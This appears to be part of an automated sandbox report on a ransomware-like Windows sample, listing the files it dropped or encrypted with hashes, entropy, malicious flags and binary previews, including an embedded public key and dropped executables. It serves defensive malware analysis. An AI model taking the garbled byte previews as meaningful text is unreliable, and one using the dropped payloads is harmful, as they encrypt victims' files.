                                                                                                                                                                                                    MD5:5CDB0A4842832196412D6F7EC5236EA0
                                                                                                                                                                                                    SHA1:87A79DFCE5E616E4C3A6FC71615DEB53F4153D21
                                                                                                                                                                                                    SHA-256:13352BC7D5C488544B74D42629CD3ED00EEC7406FC44BF7F1BBFBEF66B139CCE
                                                                                                                                                                                                    SHA-512:BDAFC7364B739447BE8722CCF817B6A3E205FDA37198CA502AC673EA2E5771C42B183D94102E94424E3BC9B689D9B75660DE3B973F06532E2D1729559414C779
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: .`.R;..n6R.4.V....:.A.....V;....f...%...'.].Z..R.)..,.H...c0X..:.?...k.v.h..._.fD86.y .ST. .]..~.......Rp..vd..kg.,.........x...j.M9.qs...i.-.Z...Urg;..b.(.O>...D..s......P-C3.&LA.AP.m.*."01...d.T._1.3....n....6...i.yG,.v}....HFW..}L....]F..z....{..md./......y.../h..}|k.D...3..Mx.c.8L*.x.QG0../7P.....2..W..G....%.bz=._.L^5VPEIoxEWaaB5A242LGR5OT4EB7Eitq2rRK1LQCB{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\SetupExe(202007230953501D8).log
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):153934
                                                                                                                                                                                                    Entropy (8bit):7.998908885680079
                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                    SSDEEP:3072:HliRfV8dNf9Z+LC+b731R3Yx6fqeMUFDAmnnbLpzGlI:Hsf2lCjxS6lFDnpqlI
                                                                                                                                                                                                    MD5:E4EA7834328694F0AEF2742D6A377ED5
                                                                                                                                                                                                    SHA1:E4084D69B26099E10E3EB29DD29B2BC88B517625
                                                                                                                                                                                                    SHA-256:1374436B9F4958ADC712FA1851E9915785D31A831FEAE7DA15E897404EA6B885
                                                                                                                                                                                                    SHA-512:8D736AFE182E86C9791B3505239B031B9185F898D373DD37719595D9D2D902B7D48A4AB8073AE0E900DB5A32A925A2003CC78FD158D673A1762087C7DF55F466
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: .P....P.g.J..V......;.8..o.....rw.{....,.!..m.&...c...:kl}`.h...19.&......i....I.r....As3Y...Cd....y....z.........V.yQT..1Pw.A...6.p.=c..~2.d`.5.\.&NU.;n.eJ.r.Ob=.f..7.._D.'m...T._..{>...6...%...[......*.98......j.E(..5I.v..e....9.L.dJ......&.n.6...gT.$..E0.i..G.....AAVX)....-6.3..^...y.g..,......[..QM7.8C#..\T..j..6..@.....y....1.....xA.y........S..[7Pu.P}+......T..%A_}.1..c..,...PbZ........K4..r`.....g.0.P.......c.....$o.../...ReSV....z~.p.M.zI..y...F..X.RA.x.g..l.....A....s.h..9.R....f~`.....dw..%u&...5.c...r+.7(..........1.......F.RW..........N.q ....?}.!.zT....qF{.6~.[=..l...]...d..L*.... C.Y.n.i.y2..Eq.T.F.....y.S ]..k....../.t.Pb..q..Q.y._+..Z....Y..T.4...S,.{$4}..:6.!.35.U.v...;_..6hs.#e..u.,#m\ZK4.J.H..]...B..).y.._7...MEt.&K#...,<.Q...p..*U.........s.mbKP.q......_...-[...+x><.:..X..:6...eBFl#.t.N9...v...\%....B.hH....h7o..>]5......OS.o.6....3.>5..$l....*.\.v..(...B.........EZO....n.M W....t.1O...c..U..i.$..+`.1......q....e.....
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\aria-debug-5924.log
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):799
                                                                                                                                                                                                    Entropy (8bit):7.718377510658081
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24:J6EBoPxHiWuiURRjU7ZsSFn2BoN40uUsZxMebaXbD:NKiWurRjU2mUNlwkarD
                                                                                                                                                                                                    MD5:DDD64268E79B2BABF6DD41A1C5419C92
                                                                                                                                                                                                    SHA1:6B35A07779AECFAD757BC7EEEF4F3CD77AB2EFE9
                                                                                                                                                                                                    SHA-256:E5631877A2D4DE811E6E34294342CC2A104897CD77A4C6B850A12886F620D900
                                                                                                                                                                                                    SHA-512:863E25FD32E2A54807544BBC6C322002E428CACAD4B1A2E7B287A052EF2584FE8164E3A6221FA6A07227DBC9FBDAD85EE306B6B0EEE9E90802F6E6CCF5FD4928
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ...`......SK.*....n.yC}...&.."...R...m....ol....=.B.W.3......!..u.w..`=...(r."<.V.u....un..%..n..f..'.lrc.|.@3p.|.j.D.~..}....0l.....[...*.)g.'....[.........W..v|....g...sz...c..F..N.......)...".-?b...s..`.[....1.^..7.`.+.~.K.R_y...$.P.|.$t."Q...(@.....~..#..._.t.......8{...H.A=..b.y...e......K.K,.Z*..(.5..?..c0".M.......)...G.X..L.3.O...'.d..lj.0.3%3.12.P....O....9.......T...........i...2..[65e3g.<..?-.{..Dmj9......0.E..{..$..Q.7.....&...A.+.x....:.......||.S..cHb.i.....F.T..ol.&.u.D.?..h^.h..Qt...96..lSSV..o..N~...1+/.]..5LN.~....k".Nj....xb..F.( ..]Q[..#.2^...r...nz.z.~=.[./.\....[..1i.h..a.....y.....g......[...z....s.c.cF......A+.gE..m....AVJ..K.U..c..#N....'`.<.(~.5VPEIoxEWaaB5A242LGR5OT4EB7Eitq2rRK1LQCB{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\chrome_installer.log
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):21743
                                                                                                                                                                                                    Entropy (8bit):7.991574221119138
                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                    SSDEEP:384:sjCoUyKnRXeXpUXmlVL4ESAigA3hdab65g83wJRaMd4w/0NhY98AsCQg:s6yKCVld4PB53hdau5gj7f//0NIZhj
                                                                                                                                                                                                    MD5:C09B921B61B6E23E6098D99845F12A7B
                                                                                                                                                                                                    SHA1:2B175CA0B89398F653853F6915F32BB5DD2591FA
                                                                                                                                                                                                    SHA-256:A4744616727BC7012D73A7D52681DE2CDA368B10AA6932E0B20284D82D086166
                                                                                                                                                                                                    SHA-512:2B25B93A9BB25F38527C4C2E38AEECF9D1888954476413BCC47F76DFB33DD0FD73CBCF3FD8565CC0ADB24F7FA9287ABD2D0BE7A406A4D01C4AFB9A4D56D5CF68
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ....,I.U....ju.#Ez{s..*.^O....w.`....N.......s..g.&p..J....*.?-.dBz&.:.....pB5.....N+kB<mR5nj$-....P.d.K..o.A2H=.e=/.3...{...z.w7U.....U*.xo.V.~..p...6(.N#..fJ.......9#D.IL...P.....5.u!42.(w....b...K.S.{.FN#...F..p`Wq.......e..TEX.....t.o.5OV..&.v..r74.......M....s....T.Yq$ PE........8.m,.[.)......=7.gb..H.P. ....V...4.?S...l...r...S.Q.X..M......|..R...65.V.V=....|..].{...W......q<...J.....W.Y...y...7..X.....4P.$.Q.6:&=..T..V[;=.....F:.........!.z.....{..../.j...k.../....[..R"W.p...k\"q.....b.@-lwE.).,.......8...'".L.....oK......{....Z..4.R..E..xR.XOKf..R.U.o.+...m!C...../_F.f5.\....j.=..NTZ....3.p..X.=...dz..sjH.6.]/@...bn.R)^E.g8^..._.@.M...$.V.....gg..-.6.Q...1.z.k.z..5.f...3.cV....o,..*..@..R....@.f."..'y......(.....^._.(.g............I9...w..]ro...@e....y..(...~\.9K.hO..e.rxI.vZ{....|<k._b..yx.?......S...v.,6.My.o.d.....A...QR.So.B.c)!]............6..D`.f.-&c$.Q.P.s.C..}.D..)=..\i.=.u..hMJ..ly.*27...3..eW+.T.i8O.h._...9.....U..
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\pl3ayzgp.mcm\unarchiver.log
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):373
                                                                                                                                                                                                    Entropy (8bit):7.333750495061761
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:6:KUEGWGO1gpyRywmjfnWkJ/Md+12um7aW1xlM4Aat7xsw8/gHB42iLki75dExciik:KUE5GOycZmxJ/u+1Jm7aWHlM4VnvHB7L
                                                                                                                                                                                                    MD5:42394232ABBE7FF5D7622616CE3DE1DA
                                                                                                                                                                                                    SHA1:7C3B273C391423A7B51696477E5F9CC6DA43674B
                                                                                                                                                                                                    SHA-256:174A76C7F36C37E8785FB94502C8BD5C643A2CAE41C6505493EEBDC338890A8B
                                                                                                                                                                                                    SHA-512:15CFDBF1073011F4081EB4D4ECEA3303183928040E0F0EE201F9213F3D77ACD261BDA1248F814D232EB7BA62AC575E78049C17765AB2C7D0DDB306065F92658A
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: .F..".......v...L.].j...h......:L7..P....CX.39d27D.&.{....,C.w...H.4.?....'...^...#O5..&.....J=+..D....w}..........P...Y.O.)..Y.........I...Q...U..P(M.&..l.}...|5....#...$..d..q.<je..9......S4%.e.l.o.....%=R..qX~.c..6x...Zd|b%.jI@)~>.0...........:..e./........?...w.S....2.orJ5VPEIoxEWaaB5A242LGR5OT4EB7Eitq2rRK1LQCB{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                                                                                                                    C:\Users\user\AppData\Local\b6f888d4-cc05-4e6a-87b2-00fd6ab00749\Ln0LqSBLhS.exe
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):153934
                                                                                                                                                                                                    Entropy (8bit):7.998807991928179
                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                    SSDEEP:3072:GCt37Vw7dcSQdGgHxArzTzFfl8ams0F6rwPAwxYIK0BDx3HqMxLev:GqLVGcwrHhl8amsm3YwxYIXHhk
                                                                                                                                                                                                    MD5:370B1D3C81CEA17145616EC75EF16756
                                                                                                                                                                                                    SHA1:E28D22FC4B90A8FA4C158BB9F7AF063A7B4EE30F
                                                                                                                                                                                                    SHA-256:2A0CDD8B1D8EA349AEA4042BEDEF727C05072AEF99E3DA450EF6636B4BD4CF65
                                                                                                                                                                                                    SHA-512:67155613BEA25E5E41FD4F05CF9BBBC8DE667101E51B9A7134DB748FF8AA7FB2D90F5435E23E761B5DC989F0FF587B38BAC0870F555BFEFB14713A749EE1452F
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ...-._..0..2.wj...Gs.x...u.^..R...7r.f..."......O.1#......4.....>.E;;..........-..H.g.J.Y..i....T......p.'....tW.O..!.'..}....O.bVG.|...-...A.Bh......9.. ...D.b;.........f..W...G.U"..p/.(.+..H.9+.%.p..5...5.}..j..^....h..C(.[....FTO.C.?..'.#\[.........:...W....q,oTl.............5......0Rx.s.\`a.,.GJ...F6....h.r.c.$...o.7.W..p(H.......#..U...f..b.D....<.u...3n....}.....2x..IQ...$Y..._..d..i...zod..g.._-.F...Y3Pt..J....S.nJ...YB)Y3.BtC[...F7.....+N...?...e..8..Zi.;#(.cc..Vz..yc....b..Q .+.sjv].-.~.U...\n....?yz..p.1.....<B~[..ry..+.W..q..0v....Q.T5_..q"...n.wH.+.F....ym.......`.Of/~..+...g....r..=......CG.P.HE......h.B..m>3E...#z..Q..2..J.q..F.y.mk....W.....Ks..P./Y...$1I...C3.....,..;.........i.MZ.....'.|4..vba._.k7.7.[.o#q.ei...p...9?...}. ui+}YG........}F....2..W.......)...|1M8.L..C)`.1....;...4p..v]..[....O.}.G.^..`...r..ME.U.....E......$.S..q..*Z.........4m.%.T.m....q.*/..V..D.i.mb8.E*.g0.|f..dn..N.l..q......`(r.TA.P3.~.|.%.a.W.
                                                                                                                                                                                                    C:\Users\user\AppData\Local\b6f888d4-cc05-4e6a-87b2-00fd6ab00749\Ln0LqSBLhS.exe:Zone.Identifier
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                    Category:modified
                                                                                                                                                                                                    Size (bytes):26
                                                                                                                                                                                                    Entropy (8bit):3.95006375643621
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                    MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                    SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                    SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                    SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: [ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                    C:\Users\user\AppData\Local\bowsakkdestx.txt
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1451
                                                                                                                                                                                                    Entropy (8bit):7.51541572091002
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24:YgJc4QTXF6zwwOmLF6TMKkr+IUdBnACW/HfyzcSrYBTF4PXKXOnHMMvLAubD:YgCVTawwOmLg7ciBnsyvYBTFICMjAMD
                                                                                                                                                                                                    MD5:CA23CF2658A4DFCA140F9CE3E41A14FB
                                                                                                                                                                                                    SHA1:2727030BC53BA217BBC6F27D060F1A221DF9078A
                                                                                                                                                                                                    SHA-256:3B97C8985714F1506CB707B8962325B8846FA90872CF239934FAEFAFC3055A2B
                                                                                                                                                                                                    SHA-512:ECA00BD7505A6F05FA2E2A00CE31A1CCDA18A8B43239891D1A725F5D9AF9F27605646BCE2E05EF5B884CE7DCA4D311A055E7E6B54D6A53A1F3D9FC82C40077C2
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: {"public_key":"-----BEGIN&#160;PUBLIC&#160;KEY-----\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2ConnkmHf3F5UYxtsjHW\\nSiM2IvLtvv4J1\/ft1bhz0esbAqY+vEkCsZk01XKhCmgnDWI7UbJRHpe1O6z4AUmI\\nDnZleNmpbjcnpQQf\/AJsji8cGQBN7M9Emo2bQA5c6hXkvjtWR4M4vl7BjYJ9jtLB\\nVPHbk2ycWgGrzLt1oJjcg6wqDaloxbSgYPTlTKJf7XV8mmHVd9\/Z\/Jxp7QvuLbw2\\nNoyha2bP9UrfGnQFruqKfv0VD33O++D\/k\/+XXqhTOuI7V8D353lJ\/wVjQ9GMlS8d\\nlr9BP5EjT5G5sfmFRugSg2vIx2Afdmq6CSWzGDea6amEaGDJBeENnw8fdGcnzPKP\\ntwIDAQAB\\n-----END&#160;PUBLIC&#160;KEY-----\\n","id":"5VPEIoxEWaaB5A242LGR5OT4EB7Eitq2rRK1LQCB"}.M..4.^.)..s....FB.\..3..T..q..9.(.......K].....j.....$..ch[.t.0.<x.M0.A...e.uw}B... .Ui..2..kke......GB..J....C..m...3D.....:c.|.b... _.?...M.s..z.5.bF:H...>....;..;#^.J~...!.%......r.}.b~6.}.?....P<......u...Y.....e %.....s}P).u......Yk..T..U...;.....q..Ot.oN..h.e..s.f....-{R.N..Y...,.*.@..0..!2.I+....x.A.."...})..7<[\..~..Vxp..n.QWZ....G7n.L..4..j.W&.T.-....q.x@..`...ck1@..[Kq.[...L..2..N..s.r..{{.8.$x.u.._L..B
                                                                                                                                                                                                    C:\Users\user\AppData\Local\e346cd35-2444-406b-9a28-805b44471c0b\build2.exe
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):761678
                                                                                                                                                                                                    Entropy (8bit):7.897710485901009
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:12288:O5AjmTKC2y61v9a/z8rKV66dPnfqoJdmXT8rnsScocFtR7czoL:Om4K7yBUKc65fq/8rsckoa
                                                                                                                                                                                                    MD5:FDCDAA7851A092BA79EC5702DDF65335
                                                                                                                                                                                                    SHA1:29B0CDEFDC0269E1294DC500EE72BD03D7C64CC5
                                                                                                                                                                                                    SHA-256:9D96B8DCD1079282E94547A8C123DBA5B72B4164207B26C542A547F718F05BC0
                                                                                                                                                                                                    SHA-512:FCDE2A9F50750151D408D396324A3E06D4C637B431FD275803F9945A6B0EE4B45F1B5C45EF41F296B9D84E2C7962BD67355CF1BA0DC5B5939833F2172A112A6A
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................................................................................................................PE..L.....)_.................6...X....../".......P....@.................................Gr..........................................<....`..@........................... R.......................n......`n..@............P...............................text....5.......6.................. ..`.rdata...?...P...@...:..............@..@.data...\....... ...z..............@....rsrc...@....`......................@..@................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                    C:\Users\user\AppData\Local\e346cd35-2444-406b-9a28-805b44471c0b\build3.exe
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):496974
                                                                                                                                                                                                    Entropy (8bit):6.664283770811396
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:12288:vWUTdLykDsrYv/A2rhDcJOWdmW5X/8svbHP:vWUTkH2rhI7mgX/8EP
                                                                                                                                                                                                    MD5:9005883DB4E7505800EDAFCD43772AA2
                                                                                                                                                                                                    SHA1:9E6F318C2DE50957724A815C454B9AAFFBEFF8AC
                                                                                                                                                                                                    SHA-256:C4F0576ACB4BDCFB985CAD367338F023FB6ACB6BB53B828A6A936797312432A6
                                                                                                                                                                                                    SHA-512:9793578C3AF8514F3877A35915E19F55A7866D8995D8C7FEB4DE689B438EBD2FBB66F439CBF2E34B890B8C145B59029DFA9A12DF613D5CEF3CBDC9A99C481199
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......0a5Xt.[.t.[.t.[.jR..a.[.jR....[.jR..L.[.S. .s.[.t.Z...[.jR..u.[.jR..u.[.jR..u.[.Richt.[.........PE..L...7..^..........................................@..................................U......................................`...P....@...V......................4...`...................................@............................................text...p........................... ..`.rdata..............................@..@.data...8...........................@....rsrc....V...@...X..................@..@.reloc...@.......B..................@..B........................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                    C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\0FDED5CEB68C302B1CDB2BDDD9D0000E76539CB0.crl
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):966
                                                                                                                                                                                                    Entropy (8bit):7.780187450423251
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24:t69VWlWTfY2eVQC2yQ1ZQhHyaSOePCUElmYr4/bMowq2FbX9j0AukUbD:tCFfwL+ZQAvhCUOib4dbNjV+D
                                                                                                                                                                                                    MD5:D6632072E178A39BC63BCFFA5BC51797
                                                                                                                                                                                                    SHA1:BB3326EC76635BD53772474567CB74803A9A0EEA
                                                                                                                                                                                                    SHA-256:1AF998FBAB6D81AD97F6BEB56D01020268FAEA6CBEAB1CEA9D97EE20AB1CFC13
                                                                                                                                                                                                    SHA-512:AE0694FDD3CBE6EDE91C6707958D31E291908E11F5916597F0FF88E3E9D6F59A77CF411047AAEAD0C9C13712632A9E9541EC4065A1196C95E8F9A38CAB4483BA
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ..).u...xC.7_x..qnU..p.....:O.wa]:.....^.O.Y8....Ey..M..........5.#i..OW..t..H.m..7G....I.E........b..e.f...[ j%.*.. .!...Us[9..>....i...g}..1x..X..[w.{z...\....c.r.xB.......!.....:......s......V.&..l0%..{G`..e....H..d... w...{}..L...sO9f.]3.B....F.7...|..0.......EC..p..q../9.+..M8dW..Em.;..%,.Z.G.p......p......$......'...."Y..;..mg.......T..'p.[.....?...S.g...=..7...N.8.}..6....y.bS..g...V...WS...b+S..Y.pHut...D.....f....74o...PK.......<.n...X...B6<....i.1X,K.....%0.9.d .Q,v...lC..e>....2.4..O.j..2H../T..........m,I.8..v...in..,$.$..~....W.#...K._Q..L..vB..w....,.^..f^;eO._.....L.b$gz.Ud..M9.....~![.M_.g../.+a.?Ld....._../...D...AqC..%5.'[5.^.:..fb.k...jp.......:..r"_..."Q.ZCfx5..t..j...i......zV.>DZ.....m....n]G].;..".Z..l>k$.v..C%....x..f.....]Yb......u.NX...................!.........!O..M.........A>.z....=Q..h...........5VPEIoxEWaaB5A242LGR5OT4EB7Eitq2rRK1LQCB{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                                                                                                                    C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\CE338828149963DCEA4CD26BB86F0363B4CA0BA5.crl
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):754
                                                                                                                                                                                                    Entropy (8bit):7.664199566715752
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:12:Q61FDUFdeUsXiN2ODf5x5166A/og7+TU+FvUlGdn9z/LHhOytD2QVXpwDXcii9a:Q61RuALiLRxf66DVKOn9zrYyh2QVZwTX
                                                                                                                                                                                                    MD5:2E79C4FE68F1172597C4426CA6B95889
                                                                                                                                                                                                    SHA1:C74FBE6DF67F4FEC677B4F524EF8CFF36F647D05
                                                                                                                                                                                                    SHA-256:50088299813A6A3F85E97C77B92B86134BC066EBCC7A2E199CD7108294AFF3D4
                                                                                                                                                                                                    SHA-512:06B79B8AC12A926372ABE3C2BA2031A1045030E901CEDD95B1FC53DB819521A6B78B44D2917E8DCC4B5C6E075B32006DBA07CE6B2AAB984F0B00C14CA26D6545
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: .|%Z.M..1]..V..kC.][....ZR...wA..}H....=..!.8.!s1.,....e..u..N..9.|F..(PI....C.}.....{P.I..$......^.SG.....e...j..F.0.2.@Z.f.T|....-%.....7...H....]9b~)..e1......WU.]6X..n.K./....]....n.c.az......9|4f...9....i.....HdkC.\$V.9=..|...6b.y.U...).....~.:a.(.{D..3...E...J.B........2.'..5..$E....o.k..H.{s.bc...q ...*4P....Pw.E6.....]X.To...1.e....{..E...=4.Y...U.j...>.A.L..6w...{1...%N.7H......V.Q..(....`.....K..M....'.o~U..]hx.R.%,.(`....T......q.j.K$.T.k..i..f.Xyb.V...y.........%..F...:...A.G.,.m...wm...%..:..\..r9d..'.Vt....u.....Y..6.......dK.TP.a..s.-r....aD....l....kn...9.G.6N.E.Zl-.'...B\1.z.hD...e...3hw..j..KCY......AR....X..Mu...5VPEIoxEWaaB5A242LGR5OT4EB7Eitq2rRK1LQCB{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                                                                                                                    C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\addressbook.acrodata
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):14785
                                                                                                                                                                                                    Entropy (8bit):7.987582397547786
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:384:E7Lz7aTY/+RrWiYetqanIfjukNECCRZBz6cu4:E7Daa+R6iYraWjukGCeZBz6c1
                                                                                                                                                                                                    MD5:C97BEF25C162E97AE7657D646141AFDC
                                                                                                                                                                                                    SHA1:6EE3A8DA07FF581C99F37E96E9043F95DFCFFDC1
                                                                                                                                                                                                    SHA-256:E6E1DB7047D34DBCCA727AB0965A55D992A816F698D1D4F4C86753B99C32038F
                                                                                                                                                                                                    SHA-512:6839FFC31AAB169C3815596346DDA32A307ABC7C9FD7F302CB9A2AEBA62F551D2B819AA73CE67DA5D4FB875AF970D48FE6C29FEE753643C2531AA25EABF71430
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: P....l..3.E.H.NN...$t.j...oo....1..H......{...7...X.!......d.D:.Z..J...=S..U....x.(........T.........I....fd.5..[.....=.DE.....l..1..r.L.......%..<...C..........C_v.'S...<.XDB..)1q0.XyQ.8...:.....O..4..A.^H,.....*.M.5My..MXkm...a.X.|..6.%....=..Jz.+...=O.rn%.3..k,o......Kz....V...&.5k{.....a.-iW.....^S.R...O.E....%..x...F......H.0....o.1........\-}..emu%...\...B.Q8f2..|.............b.....w\-..qN.p.F.\....2x.,=(.....uXeiDA.\.=s.V.xU.,K....."..Q.`H<....(..!.?L.(....8|...@..?@u.&14.T.@.~.}P..<.D..%...8......E.y.6fT.^.M..x;..,....U.C....7.~.{.M.8m.6..:TU.....;.p.T..I....6.0n....u@.J....a.i..S%&| ^.B...uW...c>.P..lF....?.!N..........1>...Vkn.?.Y....(F.p.S#....}l~gx.V...x.......'P.....7t.s.d..:..m_...[iT5..C...l..m.cz.Z..=.`..D|.....B.bH....[j.v"..Z.....@.E...I\...7I..9.O.7;yH-.$p......=..HM...qQ......r\H.@.?tB]....y<.l.....z..{'ES.!....Ol...c..r(.<.n(....wu.`f...|.m..P9.Ka...X..%V.Wu...g.'.y..A.<.7..'........A2d..-`..b....yM.\..2V;<.t.5wi>
                                                                                                                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\Bibliography\Style\APASixthEditionOfficeOnline.xsl
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):153934
                                                                                                                                                                                                    Entropy (8bit):7.99903161834526
                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                    SSDEEP:3072:TfnfjnhG2KG9NTynqaKErpFBZJYdgduagXEZxdg5VgwHAN1I:TPfjnI2KKJynFn3BZWdcuauY85Vc1I
                                                                                                                                                                                                    MD5:324C4066FE135C43FE616EA826B9CFD7
                                                                                                                                                                                                    SHA1:C601DC419DD464508CD765BBE1311C5B9E1D1411
                                                                                                                                                                                                    SHA-256:55E0D5A6F2BD0B9FD0CAD902DA7E90054DFF9B1CAA40FB92D8EEC2F6AA214D9B
                                                                                                                                                                                                    SHA-512:EA5C79128497AFBFAAF1D3C98EE2792DA0F50FDEFD1768D7FC36B38EAE109B01127056660985B492918EE24C998651224FDB048B4CB29597CEB74ACBE21278DF
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: q..~HO...?Ikn._|.....$...'.Mg.i.o...$..w..a.....@J).Z.F]s....w.....k.),..R"kr.S.r!lV....O n..p...ZlU.../'.w.D...k.....8....gDh.k..!..xw.....].L3..1....`h.j....s.I4....5.......u7.K...nAR....\b8.....v....3q.v.....;R]._Q...Em.....x.{#Sam.+G.%.....+:...S..4..n....u....ztN....I.....u/>{..u..XIm.&.]>p^...X.F..1.m..........z.C..i......Aq..00...O....y..n...........D.......H....!.\.....23Lf..U.4mmK.v..&~ ....3....x.%...w....A4T&m(,s\7.C.....aCA.:..w..L.}Ls..-......=*..kni...x....}./.~H.m.....f...bwu>'.Z..D..6".u0.zWn....wG..m..V..............~.Y.B.u.D..x...\f..J....bZ.........B...qs._...x...B.z#.a(....u..:[....|%....?O.`&...L.v..1[v_M.H.j.........z..9.;I0.....:..a.D.@..XJ....z;.*r.#lt...o...0G.c...G..../...M\..K.hJ.X..G...z.....P....p.?.O2..0.t.Q~7fH}.....y...8.(;.:.&c..G...$?.H..Q..).t..n.6.g......BbZP...).C...{.:...V....5w..):...Y%.U|p7&.....X.V..7$35P.s.....^..8........-9X.............`...kQ^..cN.Xs......./......w....z.%..........Q..u...)eM...| ..Q
